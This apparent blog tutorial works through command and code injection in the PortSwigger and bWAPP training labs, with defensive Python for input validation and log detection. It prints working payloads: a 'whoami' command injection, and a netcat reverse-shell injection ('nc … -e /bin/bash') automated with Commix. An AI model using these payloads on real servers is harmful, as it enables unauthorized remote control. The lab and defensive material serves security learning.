Master Code Injection Attacks, Ethically! 🔐

Introduction

Imagine being able to inject your own code into a website, granting you remote control over an entire server. This is the power of a Code Injection Attack. As one of the most severe vulnerabilities, it allows attackers to exploit web applications by injecting malicious code into backend systems, gaining access to valuable data or even full control over the server.

In today’s article, we will walk through two live labs demonstrating Code Injection Attacks. First, we will use the PortSwigger Lab to inject a simple OS command. Then, we will escalate in the bWAPP lab, where we’ll automate the process with the tool Commix to gain full remote access. Grab your coffee and follow along as we dive into these labs!

What is a Code Injection Attack?

A Code Injection Attack occurs when an attacker exploits an input field in a web application to run unauthorized code on the server. It usually targets poorly validated inputs such as search bars, login forms, or other data entry points. The goal is to inject code in the server’s backend language (PHP, Python, Node.js, and so on), or, in the closely related case of OS command injection, into a shell command that the backend runs, so that the attacker’s commands execute on the server. The PortSwigger lab below is the latter kind; the bWAPP lab is the former.

For instance, with code injection, you can execute commands like whoami to identify the current server user, or escalate the attack by injecting code that opens a reverse shell, providing full remote access. The potential impact of a successful Code Injection Attack ranges from stealing sensitive data to taking full control over the server, making it a critical security flaw.


Lab 1: Code Injection in PortSwigger Lab

In the first lab, we’ll use PortSwigger Lab to execute a basic command injection attack. Here, we’ll inject the whoami command into the productID parameter to see which user is running the server.

Steps:

  1. Set up Burp Suite to intercept the traffic between your browser and the web application.
  2. Modify the productID parameter in the request to include the command injection payload:

    productID=1+&whoami#&storeId=1
  3. Send the modified request and observe the response from the server, which reveals the current user (e.g., peter-tGLt5E).

Code Example (Burp Suite Command Injection):

POST /product/stock HTTP/1.1
Host: ace51f2e1e13420ac0d9be100072005a.web-security-academy.net
...
productID=1+&whoami#&storeId=1

In this case, the server responds with the username peter-tGLt5E. While this may seem like a small piece of information, it is a vital first step in understanding the privileges and permissions of the current server user.
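To see why the productID payload works and how such an endpoint should be written, here is an added illustration in Python; it is not PortSwigger's code, and the stockreport.sh script name and the digit-only ID rule are assumptions. The unsafe builder hands the value to a shell, the hardened one validates it and passes an argv list instead.

```python
import re
import shlex

# Assumed backend for a stock-check endpoint (illustrative, not PortSwigger's
# own code): a script that receives the product and store IDs as arguments.
STOCK_SCRIPT = "./stockreport.sh"

def build_command_unsafe(product_id: str, store_id: str) -> str:
    """Vulnerable pattern: untrusted values are interpolated into a shell
    string, so metacharacters such as & | ; and # are handed to /bin/sh."""
    return f"{STOCK_SCRIPT} {product_id} {store_id}"

def shell_tokens(command: str) -> list:
    """Tokenize the string the way a POSIX shell would (shlex with
    punctuation_chars splits on & | ; and treats # as a comment start)."""
    return list(shlex.shlex(command, posix=True, punctuation_chars=True))

_ID_RE = re.compile(r"[0-9]{1,10}")

def is_valid_id(value: str) -> bool:
    """Allowlist check: a legitimate ID is a short run of digits, nothing else."""
    return _ID_RE.fullmatch(value) is not None

def build_command_safe(product_id: str, store_id: str) -> list:
    """Hardened pattern: validate first, then build an argv list. Pass this list
    to subprocess.run (shell=False) so no shell ever parses the values."""
    for value in (product_id, store_id):
        if not is_valid_id(value):
            raise ValueError(f"rejected id {value!r}")
    return [STOCK_SCRIPT, product_id, store_id]

if __name__ == "__main__":
    payload = "1 &whoami#"  # the lab's productID payload, URL-decoded
    unsafe = build_command_unsafe(payload, "1")
    print("shell string:", unsafe)
    print("shell tokens:", shell_tokens(unsafe))  # whoami becomes its own command
    try:
        build_command_safe(payload, "1")
    except ValueError as err:
        print("hardened builder:", err)
```

The token list shows the shell reading `1`, then `&`, then `whoami` as a separate command, with `#` discarding the rest of the line; the allowlist rejects the same value before any process is started.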

Lab 2: Gaining Remote Access in the bWAPP Lab using Commix

In this lab, we’ll perform a more advanced Code Injection Attack using the bWAPP lab. Our goal is to gain full remote control of the server by injecting a PHP reverse shell command. This opens a backdoor on the server that we can interact with through a terminal. To automate the process, we will be using Commix, a tool that simplifies command injection attacks.

Why Use Commix?

Commix automates the process of finding and exploiting vulnerabilities in web applications. Instead of manually testing each input field, Commix will find injection points and allow us to execute commands directly on the server. This makes it ideal for situations like this, where repetitive tasks such as testing for vulnerabilities can slow you down.

Steps:

  1. Set up Netcat on your machine to listen for incoming connections:

    nc -nlvp 4444

    This opens a listener on port 4444 on your machine, which will be used to catch the reverse shell connection from the vulnerable server.

  2. Prepare the reverse shell command: In the vulnerable web application, inject the following PHP command to open a reverse shell:

    /phpi.php?message=test; system("nc 192.168.0.000 4444 -e /bin/bash");

    This tells the server to connect back to your machine (192.168.0.000 here is a placeholder for your own address) on port 4444 and attach a bash shell to that connection for remote access.

  3. Execute the reverse shell injection using Commix: With Commix, automate the injection of the PHP reverse shell command:

    commix --url="https://192.168.0.001/bWAPP/phpi.php?message=test; system('nc 192.168.0.000 4444 -e /bin/bash')" --cookie="security_level=0"

    Commix will find the vulnerable injection point and execute the reverse shell command, connecting the server back to your listener.

  4. Gain full access: Once the reverse shell is open, you can run commands on the remote server as if you were logged in locally:

    whoami
    ls
    pwd

    This gives you full control over the server, allowing you to navigate directories, execute commands, and further escalate privileges if necessary.

Code Snippets

Netcat Listener:

nc -nlvp 4444

PHP Reverse Shell Injection:

system("nc 192.168.0.117 4444 -e /bin/bash");

Commix Command:

commix --url="https://192.168.0.109/bWAPP/phpi.php?message=test; system('nc 192.168.0.117 4444 -e /bin/bash')" --cookie="security_level=0"

By using Commix and Netcat, we’ve successfully taken control of the target machine. This demonstrates the potential danger of code injection vulnerabilities: an attacker who can run arbitrary commands on the server can go on to escalate privileges and take full control of it.
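Turning the two labs around to the defender's side, here is an added detection example in Python (not from the article; the log lines are constructed and the indicator patterns are my own assumptions): it decodes query parameters from access-log lines and flags the shell-metacharacter and netcat patterns used above.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (not from either lab). The first two
# carry the article's payloads URL-encoded; the third is a normal request.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "POST /product/stock?productID=1+%26whoami%23&storeId=1 HTTP/1.1" 200 12
10.0.0.7 - - [01/Jan/2024:10:00:09 +0000] "GET /bWAPP/phpi.php?message=test%3B+system%28%27nc+192.168.0.117+4444+-e+%2Fbin%2Fbash%27%29 HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:15 +0000] "GET /product/stock?productID=3&storeId=2 HTTP/1.1" 200 12
"""

# Common log format: client, timestamp, request line, status.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Indicators, checked from most to least specific.
NETCAT_RE = re.compile(r"\bnc\b.*\s-e\s+/bin/(ba)?sh")
CODE_SINK_RE = re.compile(r"\b(system|exec|passthru|shell_exec|eval)\s*\(", re.I)
SHELL_META_RE = re.compile(r"[;&|`]|\$\(")

def suspicious_params(target: str) -> list:
    """URL-decode each query parameter and return (name, value, reason) for
    every one that looks like command or code injection."""
    findings = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if NETCAT_RE.search(value):
            findings.append((name, value, "reverse shell via netcat"))
        elif CODE_SINK_RE.search(value):
            findings.append((name, value, "code execution primitive"))
        elif SHELL_META_RE.search(value):
            findings.append((name, value, "shell metacharacter"))
    return findings

def scan_log(text: str) -> list:
    """Return one alert dict per suspicious parameter found in the log."""
    alerts = []
    for line in text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue
        for name, value, reason in suspicious_params(match["target"]):
            alerts.append({"ip": match["ip"], "ts": match["ts"], "param": name,
                           "value": value, "reason": reason})
    return alerts

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```

Standard access logs record only the request line, so the POST body the PortSwigger lab actually sends would not appear there; the first constructed line puts the parameters in the query string for illustration, and in practice the same decoder should run over WAF or application request logs that capture bodies.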

Conclusion

In this article, we explored the power of Code Injection Attacks through two practical labs. First, we used the PortSwigger Lab to run a basic whoami command, giving us insight into the server environment. Then, we escalated the attack in the bWAPP lab, using Commix and Netcat to gain full remote access.

Whether you’re a security professional or a curious learner, understanding Code Injection Attacks is vital for protecting systems from these vulnerabilities. Don’t forget to like, subscribe, and check out the video for a more detailed walkthrough. Stay secure, and stay curious!
